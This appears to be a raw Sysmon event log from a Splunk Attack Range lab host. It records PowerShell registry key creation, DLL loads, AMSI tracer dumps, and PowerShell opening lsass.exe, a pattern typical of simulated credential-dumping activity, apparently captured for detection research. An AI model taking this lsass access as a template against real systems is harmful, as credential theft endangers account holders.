17:30:08.631{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x80000000000000001530258Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.631{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530257Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.631{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530256Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.631{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530255Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.631{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530254Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.631{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530253Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.631{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530252Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.631{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530251Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.631{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530250Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.631{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530249Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.631{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530248Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.631{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530247Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.631{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530246Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.631{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530245Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.631{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530244Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.631{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530243Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.631{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530242Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.631{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530241Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.631{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530240Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.631{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x80000000000000001530239Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.631{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\4576558f9b71a2bbc8a274844c5530c8\System.Configuration.Install.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.Install.dllMD5=A8DA77D12ECE05B2F62E9C4953661141,SHA256=FC27E15E339A52EF8C0D829E7E6800365A1755A8F6DD1650018EA73CFC18996Ffalse-Unavailable 734700x80000000000000001530238Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.631{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\41c61395b8ebbe159552045c07ea1195\Microsoft.PowerShell.Commands.Utility.ni.dll10.0.14393.4225Microsoft Windows PowerShell Utility CommandsMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.PowerShell.Commands.Utility.dllMD5=0725A9ACB655F7C9AD6997C2C656BBF0,SHA256=B7A2F679AB9A46B2B8FD0DD65FDDE0440BE2D0457C55468D750726AA0C0C806Dfalse-Unavailable 11241100x80000000000000001530237Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.616{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176461965_powershell.exe_388_5368_2.dmp2021-04-21 17:30:08.616 12241200x80000000000000001530236Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.616{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x80000000000000001530235Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.616{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x80000000000000001530234Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.616{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x80000000000000001530233Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.616{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x80000000000000001530232Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.616{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x80000000000000001530231Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.616{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530230Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.616{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530229Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.616{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530228Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.616{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530227Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.616{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530226Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.616{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530225Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.616{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530224Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.616{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530223Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.616{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530222Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.616{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530221Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.616{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530220Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.616{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530219Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.616{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530218Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.616{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530217Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.616{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530216Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.616{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530215Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.616{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530214Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.616{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530213Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.616{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 11241100x80000000000000001530212Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.616{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530211Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.616{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0E0017417657B15AB9C6350F9B953CF,SHA256=D1C389B3255111DFFC0960AAC4BE60C4D65E7979A98E26943ED9605F30ABE962falsefalse - insufficient disk space 11241100x80000000000000001530210Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.600{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530209Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.600{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=181FD06ED426C5D3DEE6CA991709D795,SHA256=726A8196CFA937C145CE19F6ABBEB36381B7B594F86AB6D77CD040FD37EAB716falsefalse - insufficient disk space 11241100x80000000000000001530208Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.585{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176461996_powershell.exe_388_5368_1.dmp2021-04-21 17:30:08.585 734700x80000000000000001530207Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.569{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\7ab98d11d73082b7d4da412e9164824c\Microsoft.CSharp.ni.dll4.8.3761.0Microsoft.CSharp.dllMicrosoft® .NET FrameworkMicrosoft CorporationMicrosoft.CSharp.dllMD5=B9E34CEC4D766AFE6195FCDD5C265721,SHA256=E1D7D03019EFE1A8247C17C2575F647A7FF7E0B6C9CB9996BA29EBB8F9A8C303false-Unavailable 10341000x80000000000000001530206Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.553{21761711-83AD-607D-0B00-00000000BB01}6287724C:\Windows\system32\lsass.exe{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530205Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.553{21761711-83AD-607D-0B00-00000000BB01}6287724C:\Windows\system32\lsass.exe{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001530204Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.553{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x80000000000000001530203Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.553{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\a8f3d26344af855ac6daa7367566ac6a\System.Configuration.ni.dll4.8.4190.0 built by: NET48REL1LAST_BSystem.Configuration.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.dllMD5=B0386808CBC978446F0D8638C53F9F02,SHA256=7E05166D981CF6FA3157EE088305E2B901B9721FCED6370E9D1CE7511A71AC64false-Unavailable 734700x80000000000000001530202Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.553{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft Corporationsystem.transactions.dllMD5=D17E11DDF716089AF736DBA7C4F24C75,SHA256=DF301F2F2A735A1A75EAE79E64CCFDAD335E319B98316E9E875F726FA2CB51D5trueMicrosoft CorporationValid 734700x80000000000000001530201Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.553{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Transactions\5351712e9f473d097f2b738b204273dc\System.Transactions.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft Corporationsystem.transactions.dllMD5=B419B44AAD97CA3AA622FC69F9F700EF,SHA256=85E6B77303F3C2B52190AD6ECB73FFF9A6EB42C02D61D315128653B8D806ED7Ffalse-Unavailable 734700x80000000000000001530200Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.553{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\03eb557dfba7aa3116a9751f0bc35bf0\Microsoft.PowerShell.Security.ni.dll10.0.14393.2848Microsoft Windows PowerShell Management CommandsMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.PowerShell.Security.dllMD5=5BE2CDD8A7DADF9FB9B3F1FF93B2BAA4,SHA256=CBCD70497678A47433F4C5E24A2C801B761F5A551335F827D9C3564FBEE0B40Cfalse-Unavailable 734700x80000000000000001530199Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.551{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll4.8.4311.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Just-In-Time CompilerMicrosoft® .NET FrameworkMicrosoft Corporationclrjit.dllMD5=A85C78EB12A7B14526FEBE70EC52184B,SHA256=B240619E85EA26E3412AD8A47D7707509D61A04CAFAEC83325445B62014310D7trueMicrosoft CorporationValid 17141700x80000000000000001530198Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388\PSHost.132634998084015049.388.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 12241200x80000000000000001530197Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x80000000000000001530196Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x80000000000000001530195Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x80000000000000001530194Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x80000000000000001530193Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x80000000000000001530192Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530191Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530190Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530189Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530188Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530187Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530186Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 